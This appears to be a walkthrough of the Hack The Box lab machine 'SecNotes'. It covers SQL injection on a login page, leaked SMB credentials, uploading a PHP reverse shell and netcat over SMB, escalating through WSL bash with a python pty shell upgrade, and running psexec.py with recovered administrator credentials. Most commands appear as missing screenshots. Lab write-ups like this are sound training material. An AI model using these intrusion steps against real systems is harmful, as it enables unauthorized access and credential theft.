🎶SecNotes
https://app.hackthebox.com/machines/151
After the nmap scan, we see the web server is a login page:
I try and create an account and log in->
We get access to a dashboard and a possible username
let's try unlogging and abuse this web app with SQLis
when we connect with the credentials it fills in an error, good news
We try with some more SQLi patterns and end up having database infos leaked within the dashboard :
We find what seems to be credentials for an SMB share?
Other than the manual exploitation we could use psexec:
It did not work :
So let's go manually with passwd 92g!mA8BGjOirkL%OG*&
now create a file called 'shell.php'
and then copy on your root directory netcat:
and on the smb share of tyler:
Using the put command to upload a reverse shell and your netcat executable to an SMB share on the target system, you're creating a foothold on the target system. Even if your initial access is lost, you can regain access through the uploaded tools and i'll be able to call netcat and so trigger my reverse shell to obtain a shell ->
So now i need to trigger my shell.php file, after some looking around i found where were stored the files:
So i simply request: http://10.129.163.46:8808/shell.php
and get a shell:
and go and grab the flag:
For the elevation let's dive into subsystems:
first we saw that we needed to locate bash.exe, you can use a recursive search this way:
same for wsl.exe:
quick explanation on why we're doing this:
after trying to get a bash shell by triggering bash.exe, we get some useful infos:
We are root but on a linux machine of secnotes, so not really what we are looking for
we are in a non tty, let's try to escape
for reminder, a non tty refers to a type of device or terminal that does not have interactive capabilities like a traditional teletypewriter or terminal.
Let's try to get a shell via a python import:
python: This invokes the Python interpreter.-c: This option allows you to pass a command directly to Python for execution."import pty; pty.spawn('/bin/bash')": This is the Python code that gets executed.import pty: This imports theptymodule, which provides functions for controlling pseudo-terminals.pty.spawn('/bin/bash'): This line spawns a new interactive shell (/bin/bash). When this line is executed, it effectively starts a new shell session within the current terminal session. Thepty.spawn()function creates a new pseudo-terminal and executes the specified command (/bin/bash) within it. This results in a fully interactive shell prompt, allowing the user to execute commands and interact with the system as if they were using a normal terminal.
now let's look what we have in the root folder:
after looking through stuff we encounter:
that's a quick and easy win, let's try some other stuff
Impacket Toolkit - https://github.com/SecureAuthCorp/impacket
first, let's install impacket
psexec.py: This likely refers to a Python script namedpsexec.py. This script is likely designed to replicate the functionality of the originalPsExectool developed by Sysinternals, which allows for the execution of commands on remote Windows systems.administrator:'u6!4ZwgwOM#^OBf#Nwnh': This part of the command specifies the username and password to authenticate to the target system. In this case, the username isadministratorand the password appears to be'u6!4ZwgwOM#^OBf#Nwnh'. The password is enclosed in single quotes to ensure that special characters within it are properly interpreted.@10.129.163.46: This specifies the IP address or hostname of the target Windows system. Thepsexec.pyscript will attempt to connect to this system using the provided credentials and execute commands remotely.
And just go and fetch the file
If A/V is blocking psexec, you can use smbexec or winexe
Last updated
